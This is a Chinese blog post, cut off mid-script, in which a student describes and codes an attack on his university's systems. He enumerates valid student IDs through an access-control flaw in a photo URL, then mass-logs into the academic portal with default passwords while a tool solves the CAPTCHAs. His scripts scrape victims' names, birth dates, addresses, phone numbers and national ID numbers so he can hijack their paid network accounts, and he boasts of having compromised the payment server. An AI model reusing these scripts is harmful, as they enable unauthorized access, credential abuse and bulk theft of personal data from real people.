<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Yokeen">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Yokeen">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="无所畏惧，勇往直前">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>网络账号获取与Selenium初探 · Yokeen&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/favicon.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin="">
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin="">
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">Yokeen&#39;s Blog.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">网络账号获取与Selenium初探</a>
            </div>
    </div>
    
    <a class="home-link" href="/">Yokeen's Blog.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            网络账号获取与Selenium初探
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class="post-intro-tags">
    
        <a class="post-tag" href="javascript:void(0);" data-tags="python">python</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">3.4k</span>阅读时长: <span class="post-count reading-time">14 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/04/14</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <hr>
<p>不管全世界所有人怎么说，我都认为自己的感受才是正确的。无论别人怎么看，我绝不打乱自己的节奏。<br>                                  —–村上春树《挪威的森林》</p>
<hr>
<a id="more"></a>
<h1 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h1><blockquote>
<p>以前在实验室用网都是用wifi，自从换了个教室，wifi奇慢…</p>
</blockquote>
<p>如果要上校园网可以选择月供（40），学期供（200），自己手测了五六个同学的（学号 + 身份证后六位）…..也就将就着用了几个月。</p>
<p><strong><font color="green">现在大三下了，手头倒是有一份大三学生的信息表，但是大三的同学的网基本都停了，还是得靠大一大二的学妹来支持学长啊，所以准备写脚本囤一波帐号艰难度过这最后两三个月。</font></strong></p>
<blockquote>
<p>问：你是学安全的为什么不撸站？<br>答：冲网费的服务器已经拿下了，但是站库分离。目标IP以及帐号密码是有，但是连不上，应该是做了些许防护。</p>
</blockquote>
<blockquote>
<p>问：想办法啊！内网渗透、通过其他通信协议来传送流量，再不行，分析cookie组合方式，直接构造cookie批量登录抓取帐号密码啊（充值站某个页面返回json数据，利用console安装cookie后，可直接抓取）….<br>答：我就想写脚本练一练学习学习不行啊！</p>
</blockquote>
<p>有些事情以及其目的还是不要说太多的好…</p>
<h1 id="分析与编写"><a href="#分析与编写" class="headerlink" title="分析与编写"></a>分析与编写</h1><p><strong>简单分析了一下校园网充值站点：</strong><br>1、密码错误3次以上会输入验证码<br>2、每次刷新页面源代码中会生成一个随机四位数字，并且在post的时候会带上。</p>
<p><strong>先前写了几个demo绕第二个个步骤：</strong><br>1、利用cookielib请求第一次获取数字，请求第二次进行post发包，失败，会话不能维持。<br>2、请求第一次网站会有一个cookie，新开一个页面将原始cookie装上再次请求，不一样。<br>3、参数污染？没测…</p>
<h2 id="具体编写流程分析"><a href="#具体编写流程分析" class="headerlink" title="具体编写流程分析"></a>具体编写流程分析</h2><p>1、教务系统存在一个小越权，某个url中直接输入学号会出现照片，由此判断学号是否存在，存储一波可用学号。<br>2、写脚本进行教务系统的登录（带验证码，没有接口可以爆破）。</p>
<blockquote>
<p>这里又有个小问题，chrome，firefox等浏览器打开后会提示不能创建对象，页面显示不完全。IE安装了校方提供的文件后可以展示完全。所以不能直接在主页面进行信息爬取。在IE中分析个人信息页面的url(每个人的还特么都不一样)爬取登录之后，抓取个人信息的url，进行个人信息的爬取。</p>
</blockquote>
<p>3、有了学号以及身份证号之后，进入充值站进行抓取得到最终信息（根据网费信息是正常还是停机来抓取可用帐号）</p>
<h1 id="脚本编写"><a href="#脚本编写" class="headerlink" title="脚本编写"></a>脚本编写</h1><h2 id="获取可用学号"><a href="#获取可用学号" class="headerlink" title="获取可用学号"></a>获取可用学号</h2><p><strong>第一代</strong><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">file = open(<span class="string">'account.txt'</span>,<span class="string">'a+'</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">160000000000</span>,<span class="number">169999999999</span>):</span><br><span class="line">	url_info = <span class="string">'http://教务系统/upload/XXX/&#123;&#125;.jpg'</span>.format(i)</span><br><span class="line">	info = requests.get(url_info)</span><br><span class="line">	<span class="keyword">if</span> info.status_code == <span class="number">404</span>:</span><br><span class="line">		<span class="keyword">continue</span></span><br><span class="line">	<span class="keyword">elif</span> info.status_code ==<span class="number">200</span>:</span><br><span class="line">		<span class="keyword">print</span> i</span><br><span class="line">		account_info = str(i) + <span class="string">'\n'</span></span><br><span class="line">		file.write(account_info)</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="keyword">continue</span></span><br></pre></td></tr></table></figure></p>
<p><strong>第二代</strong><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> multiprocessing <span class="keyword">import</span> Pool</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">file = open(<span class="string">'account.txt'</span>,<span class="string">'a+'</span>)</span><br><span class="line">channel_list = list(xrange(<span class="number">160000000000</span>,<span class="number">169009999999</span>))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">spider</span><span class="params">(channel)</span>:</span></span><br><span class="line">	url_info = <span class="string">'http://教务系统/upload/XXX/&#123;&#125;.jpg'</span>.format(channel)</span><br><span class="line">	info = requests.get(url_info)</span><br><span class="line">	<span class="keyword">if</span> info.status_code == <span class="number">404</span>:</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'Error...'</span> + str(channel)</span><br><span class="line">		<span class="keyword">pass</span></span><br><span class="line">	<span class="keyword">elif</span> info.status_code ==<span class="number">200</span>:</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'Success!!'</span> + str(channel)</span><br><span class="line">		account_info = str(channel) + <span class="string">'\n'</span></span><br><span class="line">		file.write(account_info)</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="keyword">pass</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">	pool = Pool(processes=<span class="number">4</span>)</span><br><span class="line">	pool.map(spider,channel_list)</span><br></pre></td></tr></table></figure></p>
<p>实验室网老断，丢到linux服务器跑吧。<br>nohup python -u spider_account_second.py &gt; demo.log 2&gt;&amp;1 &amp;</p>
<h2 id="进行教务系统批量登录并获取其个人信息"><a href="#进行教务系统批量登录并获取其个人信息" class="headerlink" title="进行教务系统批量登录并获取其个人信息"></a>进行教务系统批量登录并获取其个人信息</h2><p><strong>用来获取信息的脚本</strong><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> urllib, urllib2</span><br><span class="line"><span class="keyword">import</span> cookielib</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">import</span> os, re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#登录url，验证码url，验证码存储路径</span></span><br><span class="line">login_url = <span class="string">"http://教务系统/Login.aspx"</span></span><br><span class="line">captcha_url = <span class="string">"http://教务系统/other/CheckCode.aspx?datetime=az"</span></span><br><span class="line">captcha_path = <span class="string">'D:\\Script demo\\python_demo\\School\\optaion_account\\jiaowu_info\\photo\\'</span> <span class="comment">#图片存储路径</span></span><br><span class="line">early_url = <span class="string">'http://教务系统/JWXS/xsMenu.aspx'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 通过cookielib来创建opener对象，保存cookie</span></span><br><span class="line">cookie = cookielib.CookieJar()</span><br><span class="line">handler = urllib2.HTTPCookieProcessor(cookie)</span><br><span class="line">opener = urllib2.build_opener(handler)</span><br><span class="line">opener.addheaders=[(<span class="string">'User-agent'</span>,<span class="string">'Mozilla/5.0'</span>)]</span><br><span class="line">urllib2.install_opener(opener)</span><br><span class="line"></span><br><span class="line"><span class="comment">#用建立好的opener对象访问验证码地址，opener对象保存访问验证码后的cookie以及图片</span></span><br><span class="line">picture = opener.open(captcha_url).read()</span><br><span class="line">local = open(<span class="string">'D:\\Script demo\\python_demo\\School\\optaion_account\\jiaowu_info\\photo\\image.jpg'</span>,<span class="string">'wb'</span>)</span><br><span class="line">local.write(picture)</span><br><span class="line">local.close()</span><br><span class="line"></span><br><span class="line"><span class="comment">#利用验证码识别工具自动输出验证码</span></span><br><span class="line">checkcode = os.popen(<span class="string">'verifyCaptchaconfig\\VerifyTool.exe verifyCaptchaconfig\\school.ci.png -f photo\\image.jpg'</span>).read()</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> checkcode</span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">"post1"</span>:<span class="string">"post1_data"</span>,</span><br><span class="line">    <span class="string">"post2"</span>:<span class="string">"post1_data"</span>,</span><br><span class="line">    <span class="string">"post3"</span>:<span class="string">"post3_data"</span>,</span><br><span class="line">    <span class="string">"Account"</span>:<span class="string">"123456789"</span>,</span><br><span class="line">    <span class="string">"PWD"</span>:<span class="string">"123456789"</span>,</span><br><span class="line">    <span class="string">"CheckCode"</span>:checkcode,</span><br><span class="line">    <span class="string">"cmdok"</span>:<span class="string">""</span></span><br><span class="line">&#125;</span><br><span class="line">post_data = urllib.urlencode(data)</span><br><span class="line"></span><br><span class="line">result = opener.open(login_url,post_data).read()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建获取信息的函数，这里边有两种情况</span></span><br><span class="line"><span class="comment"># 一、是否显示完全 有的浏览器可以显示所有页面，如IE，但是有的浏览器不可以，提示不能创建对象，这里使用源代码中的字符串来判断是否显示完全</span></span><br><span class="line"><span class="comment"># 二、是否登录成功  如果出现“other/CheckCode.aspx” 就说明没有登陆成功</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 是否登录成功，为-1则表示成功，否则则失败</span></span><br><span class="line">login_success_whether = result.find(<span class="string">'other/CheckCode.aspx'</span>)</span><br><span class="line"><span class="keyword">if</span> login_success_whether == <span class="number">-1</span>:</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"Login Success!!"</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"Login Fail....."</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 从登陆成功后的页面中找到个人资料的url</span></span><br><span class="line">info_url_early = opener.open(early_url).read()</span><br><span class="line">info_url_middle = re.findall(<span class="string">'xskp/jwxs_xskp_like\.aspx\?usermain=x\d&#123;10&#125;'</span>,info_url_early,re.S)[<span class="number">0</span>]</span><br><span class="line">info_url_after = <span class="string">'http://教务系统/JWXS/'</span> + info_url_middle</span><br><span class="line"><span class="comment"># 请求个人信息页面后抓取相关信息</span></span><br><span class="line">data_info = opener.open(info_url_after).read()</span><br><span class="line"></span><br><span class="line">Soup = BeautifulSoup(data_info,<span class="string">'lxml'</span>)</span><br><span class="line">institute = Soup.select(<span class="string">'#lbxsh'</span>)[<span class="number">0</span>].get_text()</span><br><span class="line">major = Soup.select(<span class="string">'#lbzyh'</span>)[<span class="number">0</span>].get_text()</span><br><span class="line">Class = Soup.select(<span class="string">'#lbbh'</span>)[<span class="number">0</span>].get_text()</span><br><span class="line">name = Soup.select(<span class="string">'#tbxsxm'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">birth = Soup.select(<span class="string">'#tbcsrq'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">location = Soup.select(<span class="string">'#tbjtxzdz'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">home_tel = Soup.select(<span class="string">'#tblxdh'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">ID = Soup.select(<span class="string">'#tbsfzh'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line"><span class="keyword">print</span> institute,major,Class,name,birth,location,home_tel,ID</span><br></pre></td></tr></table></figure></p>
<p><strong>稍微改善之后</strong><br>本来想再改一改用多进程或者多线程跑，先算了…<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> urllib, urllib2</span><br><span class="line"><span class="keyword">import</span> cookielib</span><br><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">import</span> os, re</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> multiprocessing <span class="keyword">import</span> Pool</span><br><span class="line"></span><br><span class="line">student_info = open(<span class="string">'student_info.txt'</span>,<span class="string">'a'</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Optain_info</span><span class="params">(account)</span>:</span></span><br><span class="line">	<span class="comment">#登录url，验证码url，验证码存储路径</span></span><br><span class="line">	login_url = <span class="string">"http://教务系统/Login.aspx"</span></span><br><span class="line">	captcha_url = <span class="string">"http://教务系统/other/CheckCode.aspx?datetime=az"</span></span><br><span class="line">	captcha_path = <span class="string">'D:\\Script demo\\python_demo\\School\\optaion_account\\jiaowu_info\\photo\\'</span></span><br><span class="line">	early_url = <span class="string">'http://教务系统/JWXS/xsMenu.aspx'</span></span><br><span class="line"></span><br><span class="line">	<span class="comment"># account = sys.argv[1]</span></span><br><span class="line">	<span class="comment"># 通过cookielib来创建opener对象，保存cookie</span></span><br><span class="line">	cookie = cookielib.CookieJar()</span><br><span class="line">	handler = urllib2.HTTPCookieProcessor(cookie)</span><br><span class="line">	opener = urllib2.build_opener(handler)</span><br><span class="line">	opener.addheaders=[(<span class="string">'User-agent'</span>,<span class="string">'Mozilla/5.0'</span>)]</span><br><span class="line">	urllib2.install_opener(opener)</span><br><span class="line"></span><br><span class="line">	<span class="comment">#用建立好的opener对象访问验证码地址，opener对象保存访问验证码后的cookie以及图片</span></span><br><span class="line">	<span class="comment">#验证码有时候会显示错误，但是概率很小，5次重复足够了。</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">5</span>):</span><br><span class="line">		picture = opener.open(captcha_url).read()</span><br><span class="line">		local = open(<span class="string">'D:\\Script demo\\python_demo\\School\\optaion_account\\jiaowu_info\\photo\\image.jpg'</span>,<span class="string">'wb'</span>)</span><br><span class="line">		local.write(picture)</span><br><span class="line">		local.close()</span><br><span class="line">		<span class="comment">#利用验证码识别工具自动输出验证码</span></span><br><span class="line">		checkcode = os.popen(<span class="string">'verifyCaptchaconfig\\VerifyTool.exe verifyCaptchaconfig\\school.ci.png -f photo\\image.jpg'</span>).read()</span><br><span class="line">		<span class="keyword">if</span> len(checkcode) == <span class="number">4</span>:</span><br><span class="line">			<span class="keyword">print</span> checkcode</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">	data = &#123;</span><br><span class="line">	    <span class="string">"post1"</span>:<span class="string">"post1_data"</span>,</span><br><span class="line">	    <span class="string">"post2"</span>:<span class="string">"post1_data"</span>,</span><br><span class="line">	    <span class="string">"post3"</span>:<span class="string">"post3_data"</span>,</span><br><span class="line">	    <span class="string">"Account"</span>:account,</span><br><span class="line">	    <span class="string">"PWD"</span>:account,</span><br><span class="line">	    <span class="string">"CheckCode"</span>:checkcode,</span><br><span class="line">	    <span class="string">"cmdok"</span>:<span class="string">""</span></span><br><span class="line">	&#125;</span><br><span class="line">	post_data = urllib.urlencode(data)</span><br><span class="line"></span><br><span class="line">	result = opener.open(login_url,post_data).read()</span><br><span class="line"></span><br><span class="line">	<span class="comment"># 创建获取信息的函数</span></span><br><span class="line">	<span class="comment"># 这里边有两种情况</span></span><br><span class="line">	<span class="comment"># 一、是否显示完全 